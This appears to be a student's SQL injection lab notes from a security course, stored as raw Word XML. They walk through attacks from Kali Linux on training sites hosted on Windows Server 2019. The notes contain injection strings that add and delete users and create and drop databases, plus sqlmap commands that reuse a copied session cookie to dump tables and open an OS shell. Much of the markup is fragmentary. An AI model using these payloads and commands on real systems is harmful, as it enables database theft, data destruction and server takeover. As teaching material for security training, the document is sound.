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Module-15  SQL Injection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Injection: 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color w:val="040c28"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a code injection technique used to attack data-driven applications</w:t>
      </w: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, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:ind w:left="144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1440" w:hanging="360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Types of SQL Injection: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2160" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:highlight w:val="white"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">In-Band SQL Injection</w:t>
        </w:r>
      </w:hyperlink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(Classic SQLi) -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type of SQL injection where the attacker receives the result as a direct response using the same communication channel.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2160" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:highlight w:val="white"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Out-of-Band SQL Injection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 -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type of SQL injection attack where the attacker is unable to use the same channel to both execute the attack and receive the results.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2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto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inferential SQL injection ( blind SQL injection) -</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto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type of SQL injection attack where the attacker cannot see the actual data returned from the database. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:ind w:left="216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ind w:left="-360" w:hanging="360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SQL Injection Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:ind w:left="9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Attacker: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:ind w:left="9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Target : Server 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:ind w:left="-360" w:hanging="360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360" w:hanging="360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(Info: Site hosted in Server 2019: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-360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25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http://www.moviescope.com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-360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25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http://www.goodshopping.com</w:t>
        </w:r>
      </w:hyperlink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2160" w:firstLine="0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360" w:firstLine="0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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps: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9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In kali os, open zap tool &gt; automated scan &gt; enter the target url “http://www.goodshopping.com”&gt; attack &gt; report &gt; generate report &gt; save report in desktop.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9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In srv 2019 &gt; search IIS &gt; goto sites &gt;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www.goodshopping.com</w:t>
        </w:r>
      </w:hyperlink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9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In srv 2019, goto search &gt; search SSMS &gt; connect &gt; select database &gt; expand goodshopping &gt; expand table &gt; dbo.login (rt.click) &gt; select top 1000 rows (to display rows)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:ind w:left="216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160" w:firstLine="0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For command injection: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In kali os browser, browse “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www.goodshopping.com</w:t>
        </w:r>
      </w:hyperlink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” &gt; login &gt; goto         username / Password input field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180" w:hanging="360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Adding username and password to database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:ind w:left="108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Cmd ( ‘bash’; insert into login values (‘hari’ , ’ haripass’);  - - </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:ind w:left="18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Deleting user from Database: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Cmd (‘ bash’ delete from login where username = ‘hari’ ; - - )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3"/>
        </w:numPr>
        <w:ind w:left="630" w:hanging="360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Creating new database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:ind w:left="63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Cmd ( blah;create database mydatabase; - - )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:ind w:left="144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Deleting Database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:p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Cmd ( blah; drop database mydatabase; - -)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:ind w:left="180" w:hanging="360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360" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:b w:val="1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SQL Map tool:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="227.99999999999997" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="36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open-source penetration testing tool designed to automate the detection and exploitation of SQL injection vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="36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tool used in penetration testing to detect and exploit SQL injection vulnerabilities in databases. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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automates the detection and exploitation of SQL injection processes and defends against them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="474747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474747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474747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90" w:hanging="36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Exploitation of SQL Injection Vulnerabilities :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="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Attacker: kali os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Victim: window server 2019 - database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Site: </w:t>
      </w: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http://www.goodshopping.com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(hosted in server 2019)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450" w:firstLine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Steps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Turn on both kali and Server 2019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kali os, goto site ‘ </w:t>
      </w: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http://www.goodshopping.com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‘ &gt; login to site &gt; username: sam, password: test &gt; goto view profile &gt; rt.click and inspect &gt; goto bottom in console &gt; run cmd “document.cookie” &gt; copy site link &amp; cookie and paste it in text file .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kali os, goto terminal &gt; run tool sql map “ sudo sqlmap -h “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 Access Database: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Cmd (  sudo sql map -u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Url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- - cookie </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copied Cookie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- - dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E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ind w:left="810" w:right="-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 Access tables of Database:</w:t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ind w:left="720" w:right="-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Cmd ( sudo sql map -u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Url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- cookie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Copied Cookie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- D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Database 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- - tables </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:ind w:left="720" w:right="-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900" w:right="-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 Access table Dump:</w:t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ind w:left="900" w:right="-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Cmd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(sudo sql map -u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Url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- cookie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Copied Cookie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- D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Database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- T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tablename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- dump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right="-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810" w:right="-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 Access Target OS Shell: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810" w:right="-720" w:hanging="360"/>
        <w:rPr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74747"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cmd (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sudo sql map -u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Url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- cookie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Copied Cookie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- -os-shell )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:ind w:left="990" w:right="-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cmd : hostname , tasklist , help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="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160" w:firstLine="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160" w:firstLine="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160" w:firstLine="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90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DSStool for SQL Injection Scanning: (tool: DSSS)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90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Damn small sql scanner in kali os</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:ind w:left="3600" w:firstLine="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0" w:hanging="270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kali os, goto github site &gt; search DDSS &gt; copy link &gt; goto terminal &gt; git clone &amp; paste link &gt; ls &gt; cd DSSS &gt; ls &gt; Python3 dsss.py . enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Run cmd ( python3 dsss.py -u </w:t>
      </w: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URL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- cookie </w:t>
      </w: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Cookie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0"/>
          <w:numId w:val="2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Rt.click on output scan result and open link to check Vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="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160" w:firstLine="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80" w:hanging="360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2880" w:firstLine="0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880" w:firstLine="0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oodshopping.com" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.goodshopping.com" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.goodshopping.com" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.goodshopping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oodshopping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victi.com/learn/in-band-sql-injection/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/learn/out-of-band-sql-injection-oob-sqli/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moviescop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